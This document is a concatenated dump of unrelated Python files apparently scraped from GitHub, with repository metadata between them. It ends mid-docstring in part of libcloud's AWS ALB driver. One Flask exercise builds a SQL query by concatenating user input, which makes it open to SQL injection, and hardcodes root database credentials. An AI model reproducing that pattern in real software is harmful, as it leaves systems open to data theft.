type=int, help='Maximum number of timesteps', required=True)\n\n    def parse_known_args(self, args: List[str] = None, namespace: Union[None, argparse.Namespace] = None):\n        return self.parser.parse_known_args(args=args, namespace=namespace)\n\n\nclass CommonArgumentsParser:\n    def __init__(self):\n        self.parser = argparse.ArgumentParser(description='Args parser for common parameters for all algorithms')\n        self.parser.add_argument('--gamma', type=float, help='Discount factor', required=False, default=0.99)\n        self.parser.add_argument('--learning_rate', type=float, help='Learning rate', required=False,\n                                 default=0.0003)\n        self.parser.add_argument('--batch_size', type=int, help='Minibatch size for each gradient update', default=256)\n        self.parser.add_argument('--net_arch', nargs='+', type=int, help='Network architecture for actor and critic',\n                                 required=False, default=[256, 256])\n        self.parser.add_argument('--activation_fn', type=str, help='Activation function used in hidden layers',\n                                 default=\"relu\", choices=Constants.ACTIVATION_FUNCTIONS_MAPPING.keys())\n\n    def 
parse_known_args(self, args: List[str] = None, namespace: Union[None, argparse.Namespace] = None):\n return self.parser.parse_known_args(args=args, namespace=namespace)\n","repo_name":"PKramek/stablebaseline3_runner","sub_path":"src/args_parser/common_args_parser.py","file_name":"common_args_parser.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36744276400","text":"from flask import Flask, request, Response\nimport json\nimport mysql.connector\n\n\nconnection = mysql.connector.connect(\n host='127.0.0.1',\n port= 3306,\n database='flight_game',\n user='root',\n password='root',\n autocommit=True\n)\n\n# 1 is the number prime\n\napp = Flask(__name__)\n\n\n@app.route('/prime_number/')\ndef prime_number(number):\n isPrime = True\n number = int(number)\n if number > 1:\n for i in range(2, number):\n if (number % i) == 0:\n isPrime = False\n break\n\n response = {\n \"isPrime\": isPrime,\n \"Number\": number\n }\n return response\n\n\nif __name__ == '__main__':\n app.run(use_reloader=True, host='127.0.0.1', port=5000)\n\n\n\n# 2 gives name and location \n\napp = Flask(__name__)\n\n\n@app.route('/airport/')\ndef airport(icao):\n sql = \"SELECT name, municipality FROM airport\"\n sql += \" WHERE ident='\" + icao + \"'\"\n cursor = connection.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n if cursor.rowcount > 0:\n for row in result:\n name = row[0]\n location = row[1]\n\n response = {\n \"Airport\" : name,\n \"Location\" : location,\n \"ICAO\" : icao\n }\n return response\n\n\nif __name__ == '__main__':\n app.run(use_reloader=True, host='127.0.0.1', port=5000)\n","repo_name":"kiianaaa/Software2_Exercises","sub_path":"Exercise-13.py","file_name":"Exercise-13.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35366894176","text":"\n\nimport time\nimport scipy.io\nimport os\nimport numpy as np\nimport theano\nimport theano.tensor as tensor\nimport theano.tensor.signal\nimport theano.tensor.signal.pool\n\nfrom cnn_classifier import init_params, init_tparams\nfrom cnn_classifier import build_model\nimport sklearn\nfrom sklearn import metrics\nimport optimizers\n\nfrom utils import get_minibatches_idx, Read_Autism_cross\nfrom utils import unzip, zipp\n\nSEED = 1101\ndef pred_error(f_pred, data, label):\n preds = f_pred(data)\n errs = (preds == label).sum().astype(theano.config.floatX)\n errs = 1. - errs/data.shape[0]\n errs = errs.astype(theano.config.floatX)\n return errs\n \ndef pred_error_all(f_pred, f_pred_prob, data, label):\n step = 2000.\n N,C,T = data.shape\n temp = f_pred_prob(data[0:1,:,:])\n pred = np.zeros((data.shape[0],))\n prob = np.zeros((data.shape[0],temp.shape[1]))\n for i in range(np.int32(np.ceil(data.shape[0]/step))):\n srt = np.int32(i * step)\n edn = np.int32(min((i+1) * step, data.shape[0]))\n pred[srt:edn] = f_pred(data[srt:edn,:,:])\n prob[srt:edn,:] = f_pred_prob(data[srt:edn,:,:])\n errs = (pred == label).sum().astype(theano.config.floatX)\n errs = 1. - errs/data.shape[0]\n errs = errs.astype(theano.config.floatX)\n return prob, pred, errs\n\n\"\"\" Training the model. \"\"\"\n\n\n\"\"\" used to calculate the prediction error. 
\"\"\"\n\nif __name__ == '__main__':\n # data is of size N x C x T\n # https://docs.python.org/2/howto/logging-cookbook.html\n Nt = 40\n K = 10\n batch_size = 200\n max_epochs = 40\n patience = 10\n lrate = 0.002\n valid_batch = 100\n dispFreq = 2\n validFreq = 10\n pool_size_cl = 40\n C = 60\n drop_rate = 0.2\n saveFreq = 100\n result_path = './Result_gpcnn_p' + str(drop_rate) + '_K_' + str(K) + '_Nt' + str(Nt) + '_C' + str(C) \n file_path = '/media/lyt/SSD/Autism/All_zscores_200/'\n if not os.path.exists(result_path):\n os.mkdir(result_path)\n for test_id in np.array([21]):\n if test_id == 4 or test_id == 7 or test_id == 22:\n continue\n train,val,test,labtrain,_,labval,labtest = Read_Autism_cross(file_path,[test_id + 1])\n _,C0,T = train.shape\n options = {}\n options['uidx'] = 0\n options['P'] = 2\n options['sigma'] = np.float32(0.001)\n options['C0'] = C0\n mat = scipy.io.loadmat('./Autism_position.mat')\n options['Lx'] = mat['chanlocs'].astype('float32') \n options['T'] = T\n options['C'] = C\n options['e_K'] = K\n options['e_Nt'] = Nt\n options['e_filter_shape'] = (K,C,1,Nt)\n options['cl_pool_size'] = pool_size_cl\n options['Wy'] =int(np.floor(float(T)/float(options['cl_pool_size'])))\n options['dropout_rate'] = drop_rate\n options['cl_Wy'] = options['Wy'] * K \n options['cl_ny'] = np.max(labtrain) + 1\n options['pre_Wy'] = options['Wy'] * K\n options['pre_ny'] = options['cl_ny']\n options['n_y'] = np.max(labtrain) + 1\n estop = False\n history_errs = []\n history_aucs = []\n best_p = None\n bad_counter = 0\n uidx = 0 # number of update done\n inits = init_params(options,'all')\n params = inits\n tparams = init_tparams(params)\n before = np.zeros((2,))\n _x,_y,f_conv,f_pred_prob, f_pred, _cost= build_model(tparams,options)\n _lr = tensor.scalar(name = 'lr')\n f_cost = theano.function([_x,_y],_cost)\n f_grad_shared, f_update = optimizers.Adam(tparams,_cost,[_x,_y],_lr)\n \n print('Start Pre-Training...')\n start_time = time.time() \n try:\n for eidx in xrange(max_epochs):\n batch_index = get_minibatches_idx(train.shape[0], batch_size,shuffle = True)\n for _, train_index in batch_index:\n uidx = uidx + 1\n options['uidx'] = options['uidx'] + 1\n x = train[train_index,:,:]\n y = labtrain[train_index]\n cost = f_grad_shared(x,y)\n f_update(lrate,0.)\n if np.mod(eidx + 1,dispFreq) == 0:\n print('Epoch ' + str(eidx) + ' Update ' + str(uidx) + ' Cost ' + str(cost))\n if np.mod(eidx + 1, saveFreq) == 0:\n if best_p is not None:\n params = best_p\n else:\n params = unzip(tparams)\n np.savez('./model.npz',history_errs = history_errs,**params)\n if np.mod(eidx + 1,validFreq) == 0:\n train_prod,train_pred, train_err = pred_error_all(f_pred,f_pred_prob, train, labtrain)\n #train_auc = metrics.roc_auc_score(labtrain,train_pred[:,1])\n val_prod, val_pred, val_err = pred_error_all(f_pred,f_pred_prob, val, labval)\n #val_auc = metrics.roc_auc_score(labval,val_pred[:,1])\n test_prod, test_pred, test_err = pred_error_all(f_pred,f_pred_prob, test, labtest)\n #test_auc = metrics.roc_auc_score(labtest,test_pred[:,1])\n history_errs.append([train_err,val_err,test_err])\n #history_aucs.append([train_auc,val_auc,test_auc]) \n print('Train ' + str(train_err) + ' Val ' + str(val_err) + ' Test ' + str(test_err))\n #print('Train ' + str(train_auc) + ' Val ' + str(val_auc) + ' Test ' + str(test_auc)) \n if uidx == 0 or val_err<=np.array(history_errs)[:,1].min():\n best_p = unzip(tparams)\n bad_counter = 0\n before[0] = test_err\n #before[1] = test_auc\n confusion = 
sklearn.metrics.confusion_matrix(labtest,test_pred)\n                    if len(history_errs) > patience and val_err >= np.array(history_errs)[:-patience,0].min():\n                        # increment the early-stopping counter\n                        bad_counter = bad_counter + 1\n                        if bad_counter > patience:\n                            estop = True\n                            break\n                if estop:\n                    break\n\n\n\n        except KeyboardInterrupt:\n            print('Training interrupted')\n        end_time = time.time()\n        if best_p is not None:\n            zipp(best_p,tparams)\n        else:\n            best_p = unzip(tparams)\n\n\n\n        max_epochs = 100\n        patience = 10\n        lrate = 0.002\n        valid_batch = 100\n        print('Start Training...')\n        start_time = time.time() \n        try:\n            for eidx in range(max_epochs):\n                batch_index = get_minibatches_idx(train.shape[0], batch_size,shuffle = True)\n                for _, train_index in batch_index:\n                    uidx = uidx + 1\n                    options['uidx'] = options['uidx'] + 1\n                    x = train[train_index,:,:]\n                    y = labtrain[train_index]\n                    cost = f_grad_shared(x,y)\n                    f_update(lrate,1.)\n                if np.mod(eidx + 1,dispFreq) == 0:\n                    print('Epoch ' + str(eidx) + ' Update ' + str(uidx) + ' Cost ' + str(cost))\n                if np.mod(eidx + 1, saveFreq) == 0:\n                    if best_p is not None:\n                        params = best_p\n                    else:\n                        params = unzip(tparams)\n                    np.savez('./model.npz',history_errs = history_errs,**params)\n                if np.mod(eidx + 1,validFreq) == 0:\n                    train_prod, train_pred, train_err = pred_error_all(f_pred,f_pred_prob, train, labtrain)\n                    #train_auc = metrics.roc_auc_score(labtrain,train_pred[:,1])\n                    val_prod, val_pred, val_err = pred_error_all(f_pred,f_pred_prob, val, labval)\n                    #val_auc = metrics.roc_auc_score(labval,val_pred[:,1])\n                    test_prod, test_pred, test_err = pred_error_all(f_pred,f_pred_prob, test, labtest)\n                    #test_auc = metrics.roc_auc_score(labtest,test_pred[:,1])\n                    history_errs.append([train_err,val_err,test_err])\n                    #history_aucs.append([train_auc,val_auc,test_auc]) \n                    print('Train ' + str(train_err) + ' Val ' + str(val_err) + ' Test ' + str(test_err))\n                    #print('Train ' + str(train_auc) + ' Val ' + str(val_auc) + ' Test ' + str(test_auc)) \n                    if uidx == 0 or val_err<=np.array(history_errs)[:,1].min():\n                        best_p = unzip(tparams)\n                        bad_counter = 0\n                        before[0] = test_err\n                        #before[1] = test_auc\n                        confusion = sklearn.metrics.confusion_matrix(labtest,test_pred)\n                    if len(history_errs) > patience and val_err >= np.array(history_errs)[:-patience,0].min():\n                        bad_counter = bad_counter + 1\n                        if bad_counter > patience:\n                            estop = True\n                            break\n                if estop:\n                    break\n\n        except KeyboardInterrupt:\n            print('Training interrupted')\n        end_time = time.time()\n        if best_p is not None:\n            zipp(best_p,tparams)\n        else:\n            best_p = unzip(tparams)\n        scipy.io.savemat(result_path + '/Result_' + str(test_id + 1) + '_' + str(before[0]) + '.mat',{'inits':inits, 'best_p':best_p, 'history_errs':history_errs,'confusion':confusion}) \n        print('Best Test Error is: ' + str(before[0]) + ', AUC is ' + str(before[1]))\n","repo_name":"yitong91/SyncNet","sub_path":"Theano_Version/main_autism.py","file_name":"main_autism.py","file_ext":"py","file_size_in_byte":9848,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"7406773311","text":"from text_splitter import *\r\n\r\n\r\nclass Room:\r\n    def __init__(self, room_name, long_description=None, short_description=None, look_at=None, exits=None):\r\n        self.name = room_name\r\n        self.long_description = long_description\r\n        self.short_description = short_description\r\n        self.look_at = look_at\r\n        self.exits = exits\r\n        self.linked_rooms = {}\r\n        self.items_in_room = {}\r\n        self.is_locked = True\r\n        self.first_visit = True\r\n        self.been_explored = False\r\n        self.features = {}\r\n\r\n    def 
get_name(self):\r\n return self.name\r\n\r\n def set_description(self, room_description):\r\n self.description = room_description\r\n\r\n def get_description(self):\r\n return self.long_description\r\n\r\n def get_secondary_description(self):\r\n if self.name == \"Wine Cellar\":\r\n if self.is_locked == True:\r\n return self.short_description['locked']\r\n else:\r\n return self.short_description['unlocked']\r\n elif self.name == \"Library\":\r\n if self.is_locked == True:\r\n return self.short_description['locked']\r\n else:\r\n return self.short_description['unlocked']\r\n elif self.name == \"Master Suite\":\r\n if self.is_locked == True:\r\n return self.short_description['not moved']\r\n else:\r\n return self.short_description['moved']\r\n elif self.name == 'Basement':\r\n if self.is_locked == True:\r\n return self.short_description['not used flashlight']\r\n else:\r\n return self.short_description['used flashlight']\r\n elif self.name == 'Secret Room':\r\n if self.is_locked == True:\r\n return self.short_description['not cut chain']\r\n else:\r\n return self.short_description['cut chain']\r\n return self.short_description\r\n\r\n def describe(self):\r\n if self.first_visit:\r\n print_split(self.get_description())\r\n self.first_visit = False\r\n else:\r\n print_split(self.get_secondary_description())\r\n\r\n def link_room(self, room_to_link, direction):\r\n self.linked_rooms[direction] = room_to_link\r\n\r\n def get_details(self):\r\n count = 1\r\n print(\"=\"*TEXT_WIDTH)\r\n print(self.get_name())\r\n print(\"=\"*TEXT_WIDTH)\r\n self.describe()\r\n has_gettable_items = False\r\n for key, value in self.items_in_room.items(): # check for getable items in room\r\n if value.is_getable == True:\r\n has_gettable_items = True\r\n if has_gettable_items:\r\n print(\"-\"*TEXT_WIDTH)\r\n print(\"The following items are in the room:\")\r\n\r\n for key, value in self.items_in_room.items(): # display all items that are getable\r\n if value.is_getable:\r\n print_split(\"%2d: %s: %s\" %\r\n (count, value.name, value.description))\r\n count += 1\r\n print(\"-\"*TEXT_WIDTH)\r\n\r\n for direction in self.linked_rooms:\r\n room = self.linked_rooms[direction]\r\n print(\"The \" + room.get_name() + \" is \" + direction)\r\n\r\n def move(self, direction):\r\n if direction in self.linked_rooms:\r\n return self.linked_rooms[direction]\r\n else:\r\n print(\"You can't go that way\")\r\n return self\r\n\r\n def get_explore(self):\r\n if not self.been_explored:\r\n self.been_explored = True\r\n\r\n def add_feature(self, key, value):\r\n self.features[key] = value\r\n\r\n def add_item(self, item):\r\n self.items_in_room[item.name] = item\r\n\r\n def take_item(self, item):\r\n del self.items_in_room[item]\r\n","repo_name":"kevinbray84/467","sub_path":"room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15316887783","text":"import os\n\nfrom common import RegCommon\n\ngrids = []\n\n\ndef narrow_letters(groups):\n group_letters = []\n for item in groups[0]:\n while len(group_letters) < len(item):\n group_letters.append(set())\n\n for lidx, letter in enumerate(item):\n group_letters[lidx].add(letter)\n\n return group_letters\n\n\ndef reduce_matches(letters, group):\n new_group = []\n for idx, items in enumerate(group):\n possible_letters = letters[idx]\n new_group.append([])\n for item in items:\n if item[0] not in possible_letters:\n continue\n\n new_group[idx].append(item)\n\n return 
new_group\n\n\ndef narrow_choices():\n col_letters = narrow_letters(RegCommon.col_matches)\n RegCommon.row_matches = reduce_matches(col_letters, RegCommon.row_matches)\n\n row_letters = narrow_letters(RegCommon.row_matches)\n RegCommon.col_matches = reduce_matches(row_letters, RegCommon.col_matches)\n \n\ndef compare_cols_to_rows():\n global grids\n \n one, two, three, four = RegCommon.col_matches\n \n for r1 in one:\n for r2 in two:\n for r3 in three:\n for r4 in four:\n rows = [[r1[idx],r2[idx],r3[idx],r4[idx]] for idx in range(0,4)]\n grid = [''.join(row) in RegCommon.row_matches[idx] for idx, row in enumerate(rows)]\n if all(grid): \n grids.append(rows)\n\n\ndef write_grids():\n global grids\n pth = os.path.dirname(os.path.abspath(__file__))\n fp = '{}/matching_grids.txt'.format(pth)\n with open(fp, 'w+') as fd:\n for grid in grids:\n lines = [' '.join(line) + '\\n' for line in grid]\n fd.writelines(lines)\n\n\ndef compare_main():\n narrow_choices()\n compare_cols_to_rows()\n write_grids()\n\n\nif __name__ == \"__main__\":\n compare_main()","repo_name":"davidlathrop/workatlinkedinpuzzle","sub_path":"regex_test/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23689935052","text":"__all__ = [\"ApplicationLBDriver\"]\n\nfrom libcloud.utils.xml import findall, findtext\nfrom libcloud.common.aws import AWSGenericResponse, SignedAWSConnection\nfrom libcloud.loadbalancer.base import Driver, Member, LoadBalancer\nfrom libcloud.loadbalancer.types import State\n\nVERSION = \"2015-12-01\"\nHOST = \"elasticloadbalancing.%s.amazonaws.com\"\nROOT = \"/%s/\" % (VERSION)\nNS = \"http://elasticloadbalancing.amazonaws.com/doc/{}/\".format(VERSION)\n\n\nclass ALBResponse(AWSGenericResponse):\n \"\"\"\n Amazon ALB response class.\n \"\"\"\n\n namespace = NS\n exceptions = {}\n xpath = \"Error\"\n\n\nclass ALBConnection(SignedAWSConnection):\n version = VERSION\n host = HOST\n responseCls = ALBResponse\n service_name = \"elasticloadbalancing\"\n\n\nclass ALBTargetGroup:\n \"\"\"\n AWS ALB target group class\n http://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-target-groups.html\n \"\"\"\n\n def __init__(\n self,\n target_group_id,\n name,\n protocol,\n port,\n vpc,\n driver,\n health_check_timeout=5,\n health_check_port=\"traffic-port\",\n health_check_path=\"/\",\n health_check_proto=\"HTTP\",\n health_check_matcher=\"200\",\n health_check_interval=30,\n healthy_threshold=5,\n unhealthy_threshold=2,\n balancers=[],\n members=[],\n ):\n self.id = target_group_id\n self.name = name\n self.protocol = protocol\n self.port = port\n self.vpc = vpc\n self.health_check_timeout = health_check_timeout\n self.health_check_port = health_check_port\n self.health_check_path = health_check_path\n self.health_check_proto = health_check_proto\n self.health_check_matcher = health_check_matcher\n self.health_check_interval = health_check_interval\n self.healthy_threshold = healthy_threshold\n self.unhealthy_threshold = unhealthy_threshold\n\n self._balancers = balancers\n self._balancers_arns = [lb.id for lb in balancers] if balancers else []\n self._members = members\n self._members_ids = [mb.id for mb in members] if members else []\n self._driver = driver\n\n @property\n def balancers(self):\n if not self._balancers and self._balancers_arns:\n self._balancers = []\n for balancer_arn in self._balancers_arns:\n 
self._balancers.append(self._driver.get_balancer(balancer_arn))\n return self._balancers\n\n @balancers.setter\n def balancers(self, val):\n self._balancers = val\n self._balancers_arns = [lb.id for lb in val] if val else []\n\n @property\n def members(self):\n if not self._members:\n mbrs = self._driver._ex_get_target_group_members(self)\n self._members = mbrs\n self._members_ids = [mb.id for mb in mbrs] if mbrs else []\n\n return self._members\n\n @members.setter\n def members(self, val):\n self._members = val\n self._members_ids = [mb.id for mb in val] if val else []\n\n\nclass ALBListener:\n \"\"\"\n AWS ALB listener class\n http://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-listeners.html\n \"\"\"\n\n def __init__(\n self,\n listener_id,\n protocol,\n port,\n balancer,\n driver,\n action=\"\",\n ssl_policy=\"\",\n ssl_certificate=\"\",\n rules=[],\n ):\n self.id = listener_id\n self.protocol = protocol\n self.port = port\n self.action = action\n self.ssl_policy = ssl_policy\n self.ssl_certificate = ssl_certificate\n\n self._balancer = balancer\n self._balancer_arn = balancer.id if balancer else None\n self._rules = rules\n self._driver = driver\n\n @property\n def balancer(self):\n if not self._balancer and self._balancer_arn:\n self._balancer = self._driver.get_balancer(self._balancer_arn)\n return self._balancer\n\n @balancer.setter\n def balancer(self, val):\n self._balancer = val\n self._balancer_arn = val.id\n\n @property\n def rules(self):\n if not self._rules:\n self._rules = self._driver._ex_get_rules_for_listener(self)\n return self._rules\n\n @rules.setter\n def rules(self, val):\n self._rules = val\n\n\nclass ALBRule:\n \"\"\"\n AWS ALB listener rule class\n http://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-listeners.html#listener-rules\n \"\"\"\n\n def __init__(\n self,\n rule_id,\n is_default,\n priority,\n target_group,\n driver,\n conditions={},\n listener=None,\n ):\n self.id = rule_id\n self.is_default = is_default\n self.priority = priority\n self.conditions = conditions\n\n self._listener = listener\n self._listener_arn = listener.id if listener else None\n self._target_group = target_group\n self._target_group_arn = target_group.id if target_group else None\n self._driver = driver\n\n @property\n def target_group(self):\n if not self._target_group and self._target_group_arn:\n self._target_group = self._driver.ex_get_target_group(self._target_group_arn)\n return self._target_group\n\n @target_group.setter\n def target_group(self, val):\n self._target_group = val\n self._target_group_arn = val.id\n\n @property\n def listener(self):\n if not self._listener and self._listener_arn:\n self._listener = self.driver.ex_get_listener(self._listener_arn)\n return self._listener\n\n @listener.setter\n def listener(self, val):\n self._listener = val\n self._listener_arn = val.id\n\n\nclass ApplicationLBDriver(Driver):\n name = \"Amazon Application Load Balancing\"\n website = \"http://aws.amazon.com/elasticloadbalancing/\"\n connectionCls = ALBConnection\n signature_version = \"4\"\n\n def __init__(self, access_id, secret, region, token=None):\n self.token = token\n self.region = region\n self.region_name = region\n super().__init__(access_id, secret, token=token, host=HOST % region, region=region)\n\n def list_protocols(self):\n \"\"\"\n Return list of protocols supported by driver\n\n :rtype: ``list`` of ``strings``\n \"\"\"\n return [\"http\", \"https\"]\n\n def list_balancers(self):\n \"\"\"\n List all load 
balancers\n\n        :rtype: ``list`` of :class:`LoadBalancer`\n        \"\"\"\n        params = {\"Action\": \"DescribeLoadBalancers\"}\n        data = self.connection.request(ROOT, params=params).object\n        return self._to_balancers(data)\n\n    def get_balancer(self, balancer_id):\n        \"\"\"\n        Get a load balancer object by ARN\n\n        :param balancer_id: ARN of load balancer you wish to fetch.\n        :type balancer_id: ``str``\n\n        :rtype: :class:`LoadBalancer`\n        \"\"\"\n        params = {\n            \"Action\": \"DescribeLoadBalancers\",\n            \"LoadBalancerArns.member.1\": balancer_id,\n        }\n        data = self.connection.request(ROOT, params=params).object\n        return self._to_balancers(data)[0]\n\n    def create_balancer(\n        self,\n        name,\n        port,\n        protocol,\n        algorithm,\n        members,\n        ex_scheme=None,\n        ex_security_groups=None,\n        ex_subnets=None,\n        ex_tags=None,\n        ex_ssl_cert_arn=None,\n    ):\n        \"\"\"\n        Create a new load balancer instance.\n\n        AWS ALB balancer creation consists of 5 steps:\n        http://docs.aws.amazon.com/elasticloadbalancing/latest/APIReference/Welcome.html\n\n        create_balancer() is a standard API method, so it is implemented as a\n        wrapper here to preserve compatibility with other drivers where LB\n        creation is a one-step process. It calls the respective ALB methods to\n        assemble a ready-to-use load balancer.\n\n        :param name: Name of the new load balancer\n        :type name: ``str``\n\n        :param port: Port number to setup load balancer listener\n        :type port: ``int``\n\n        :param protocol: Load balancer protocol, should be 'HTTP' or 'HTTPS'.\n        :type protocol: ``str``\n\n        :param algorithm: Load balancing algorithm. Ignored for AWS ALB.\n        :type algorithm: :class:`Algorithm` or ``None``\n\n        :param members: List of Members to attach to the balancer. If 'port'\n                        attribute is set for the member - load balancer will\n                        send traffic there. Otherwise - load balancer port is\n                        used on the member's side. 'ip' attribute is ignored.\n        :type members: ``list`` of :class:`Member`\n\n        :param ex_scheme: Scheme of load balancer. Can be 'internet-facing' or\n                          'internal'.\n        :type ex_scheme: ``str``\n\n        :param ex_security_groups: List of load balancer security group ids.\n        :type ex_security_groups: ``list`` of ``str``\n\n        :param ex_subnets: List of load balancer subnet ids.\n        :type ex_subnets: ``list`` of ``str``\n\n        :param ex_tags: Tags to assign to the load balancer.\n        :type ex_tags: ``dict``\n\n        :param ex_ssl_cert_arn: SSL certificate ARN to use when load balancer\n                                protocol is 'HTTPS'.\n        :type ex_ssl_cert_arn: ``str``\n\n        :return: LoadBalancer object\n        :rtype: :class:`LoadBalancer`\n        \"\"\"\n\n        ex_scheme = ex_scheme or \"\"\n        ex_security_groups = ex_security_groups or []\n        ex_subnets = ex_subnets or []\n        ex_tags = ex_tags or {}\n        ex_ssl_cert_arn = ex_ssl_cert_arn or \"\"\n\n        balancer = self.ex_create_balancer(\n            name,\n            scheme=ex_scheme,\n            security_groups=ex_security_groups,\n            subnets=ex_subnets,\n            tags=ex_tags,\n        )\n\n        target_group = self.ex_create_target_group(\n            name + \"-tg\",\n            port,\n            protocol,\n            balancer.extra.get(\"vpc\"),\n            health_check_proto=protocol,\n        )\n        self.ex_register_targets(target_group, members)\n        listener = self.ex_create_listener(\n            balancer, port, protocol, target_group, ssl_cert_arn=ex_ssl_cert_arn\n        )\n\n        balancer.extra[\"listener\"] = listener\n\n        return balancer\n\n    def ex_create_balancer(\n        self,\n        name,\n        addr_type=\"ipv4\",\n        scheme=\"internet-facing\",\n        security_groups=None,\n        subnets=None,\n        tags=None,\n    ):\n        \"\"\"\n        AWS-specific method to create a new load balancer. 
Since ALB is a\n composite object (load balancer, target group, listener etc) - extra\n methods must be called to assemble ready-to-use balancer.\n\n :param name: Name of the new load balancer\n :type name: ``str``\n\n :param addr_type: Load balancer address type. Can be 'ipv4' or 'ipv6'.\n :type addr_type: ``str``\n\n :param scheme: Scheme of load balancer. Can be 'internet-facing' or\n 'internal'.\n :type scheme: ``str``\n\n :param security_groups: List of load balancer security group ids.\n :type security_groups: ``list`` of ``str``\n\n :param subnets: List of load balancer subnet ids.\n :type subnets: ``list`` of ``str``\n\n :param tags: Tags to assign to the load balancer.\n :type tags: ``dict``\n\n :return: LoadBalancer object\n :rtype: :class:`LoadBalancer`\n \"\"\"\n\n security_groups = security_groups or []\n subnets = subnets or []\n tags = tags or {}\n\n # mandatory params\n params = {\"Action\": \"CreateLoadBalancer\", \"Name\": name}\n\n idx = 0\n for subnet in subnets:\n idx += 1\n params[\"Subnets.member.\" + str(idx)] = subnet\n\n # optional params\n params.update(\n {\n \"IpAddressType\": addr_type, # Valid Values: ipv4 | dualstack\n \"Scheme\": scheme, # Valid Values: internet-facing | internal\n }\n )\n\n idx = 0\n for sg in security_groups:\n idx += 1\n params[\"SecurityGroups.member.\" + str(idx)] = sg\n\n idx = 0\n for k, v in tags.items():\n idx += 1\n params[\"Tags.member.\" + str(idx) + \".Key\"] = k\n params[\"Tags.member.\" + str(idx) + \".Value\"] = v\n\n data = self.connection.request(ROOT, params=params).object\n\n xpath = \"CreateLoadBalancerResult/LoadBalancers/member\"\n for el in findall(element=data, xpath=xpath, namespace=NS):\n balancer = self._to_balancer(el)\n\n return balancer\n\n def ex_create_target_group(\n self,\n name,\n port,\n proto,\n vpc,\n health_check_interval=30,\n health_check_path=\"/\",\n health_check_port=\"traffic-port\",\n health_check_proto=\"HTTP\",\n health_check_timeout=5,\n health_check_matcher=\"200\",\n healthy_threshold=5,\n unhealthy_threshold=2,\n ):\n \"\"\"\n Create a target group for AWS ALB load balancer.\n\n :param name: Name of target group\n :type name: ``str``\n\n :param port: The port on which the targets receive traffic.\n This port is used unless you specify a port override when\n registering the target.\n :type port: ``int``\n\n :param proto: The protocol to use for routing traffic to the targets.\n Can be 'HTTP' or 'HTTPS'.\n :type proto: ``str``\n\n :param vpc: The identifier of the virtual private cloud (VPC).\n :type vpc: ``str``\n\n :param health_check_interval: The approximate amount of time, in\n seconds, between health checks of an\n individual target. The default is\n 30 seconds.\n :type health_check_interval: ``int``\n\n :param health_check_path: The ping path that is the destination on\n the targets for health checks. The default is /\n :type health_check_path: ``str``\n\n :param health_check_port: The port the load balancer uses when\n performing health checks on targets.\n The default is traffic-port, which indicates\n the port on which each target receives traffic\n from the load balancer.\n :type health_check_port: ``str``\n\n :param health_check_proto: The protocol the load balancer uses when\n performing health checks on targets.\n Can be 'HTTP' (default) or 'HTTPS'.\n :type health_check_proto: ``str``\n\n :param health_check_timeout: The amount of time, in seconds, during\n which no response from a target means\n a failed health check. 
The default is 5s.\n        :type health_check_timeout: ``int``\n\n        :param health_check_matcher: The HTTP codes to use when checking for\n                                     a successful response from a target.\n                                     Valid values: \"200\", \"200,202\", \"200-299\".\n        :type health_check_matcher: ``str``\n\n        :param healthy_threshold: The number of consecutive health check\n                                  successes required before considering\n                                  an unhealthy target healthy. The default is 5.\n        :type healthy_threshold: ``int``\n\n        :param unhealthy_threshold: The number of consecutive health check\n                                    failures required before considering\n                                    a target unhealthy. The default is 2.\n        :type unhealthy_threshold: ``int``\n\n        :return: Target group object.\n        :rtype: :class:`ALBTargetGroup`\n        \"\"\"\n\n        # mandatory params\n        params = {\n            \"Action\": \"CreateTargetGroup\",\n            \"Name\": name,\n            \"Protocol\": proto,\n            \"Port\": port,\n            \"VpcId\": vpc,\n        }\n\n        # optional params\n        params.update(\n            {\n                # Valid Values: Min value of 5. Max value of 300.\n                \"HealthCheckIntervalSeconds\": health_check_interval,\n                \"HealthCheckPath\": health_check_path,\n                \"HealthCheckPort\": health_check_port,\n                # Valid Values: HTTP | HTTPS\n                \"HealthCheckProtocol\": health_check_proto,\n                # Valid Range: Min value of 2. Max value of 60.\n                \"HealthCheckTimeoutSeconds\": health_check_timeout,\n                # Valid Range: Minimum value of 2. Maximum value of 10.\n                \"HealthyThresholdCount\": healthy_threshold,\n                # Valid Range: Minimum value of 2. Maximum value of 10.\n                \"UnhealthyThresholdCount\": unhealthy_threshold,\n                # Valid values: \"200\", \"200,202\", \"200-299\"\n                \"Matcher.HttpCode\": health_check_matcher,\n            }\n        )\n\n        data = self.connection.request(ROOT, params=params).object\n\n        xpath = \"CreateTargetGroupResult/TargetGroups/member\"\n        for el in findall(element=data, xpath=xpath, namespace=NS):\n            target_group = self._to_target_group(el)\n\n        return target_group\n\n    def ex_register_targets(self, target_group, members=None):\n        \"\"\"\n        Register members as targets at target group\n\n        :param target_group: Target group to register the members with.\n        :type target_group: :class:`ALBTargetGroup`\n\n        :param members: List of Members to attach to the balancer. If 'port'\n                        attribute is set for the member - load balancer will\n                        send traffic there. Otherwise - load balancer port is\n                        used on the member's side. 
